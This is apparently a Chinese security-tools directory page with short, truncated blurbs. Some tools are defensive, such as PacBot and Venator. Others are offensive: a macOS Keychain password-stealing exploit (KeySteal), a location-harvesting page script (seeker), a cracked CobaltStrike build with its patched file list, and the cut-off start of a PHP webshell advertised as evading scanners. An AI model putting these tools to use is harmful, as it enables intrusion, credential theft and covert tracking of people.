安全工具

rtty rtty是一个你可以在任何地方通过Web访问你的设备的终端远程管理工具。通过设备ID（如果不设置则使用设备的MAC地址）来区分你的不同的设备。 rtty rttylinux多终端管理 rtty终端文件操作 它...

KeySteal是一个macOS <= 10.14.3 Keychain漏洞利用程序，允许您在没有用户提示的情况下访问Keychain中的密码。由两部分组成： 守护进程: 这个守护进程利用 securityd 获得一个允许访问 Keychain 的会话，...

PacBot PacBot，全名为“Policy as Code Bot”，它是一款针对云环境的持续性安全监控平台。在PacBot中，安全策略与合规性策略均通过代码实现。PacBot发现的所有资源都将根据这些策略来进行安全评估，以衡量策略...

经常出现这样的错误，你要输入某个命令时，只记得前半部分，或是某个单词拼写记不全，就会提示命令不存在或错误，比如： brew iastall pip3 拼写错误，是的这很低级，但却真的会发生，特别是对于一些不经...

seeker seeker是一个通过页面获得高精度位置信息的模拟脚本。这个应用场景很常见，你在移动端访问某些页面时（特别是微信页面）经常会提示要请求位置信息，如果你点了允许，那么你的信息就会被收集。这个脚本...

FinalRecon是一个用于公开资源情报计划（Open source intelligence ）简称OSINT的网络侦察 python 脚本。 它采用模块化结构，有很好的扩展性。 FinalRecon功能 Header信息 WHOIS查询 SSL证书详细信...

Zan Proxy Zan Proxy 是一个用Node.js编写的HTTP代理服务器，可用于修改请求地址和模拟响应数据。它同时也是一个自定义DNS解析和请求监控的工具。 该代理服务器有人性化的界面，简单易用。我们还为开发者提供...

Venator Venator 是一个用于主动检测并收集macOS数据的 python 工具，获得数据后供分析哪些是恶意活动，macOS几乎很少有类似的工具。使用原生 macOS python 版本(2.7. x)开发，支持 High Sierra 和 Mojave。 ...

CobaltStrike3.13 破解版 破解记录 关键文件位置 aggressor/dialogs/ListenerDialog.class common/ArtifactUtils.class common/License.class server/ProfileEdits.class resources/xor.bin resources/...

一个可以绕过当前市面上几乎所有Webshell查杀的免杀PHP一句话木马脚本。 <?php /** * Noticed: (PHP 5 >= 5.3.0, PHP 7) * */ $password = "uedbox.com"; $wx = substr($_SERVER["HTTP_REFERER"],-7,-4...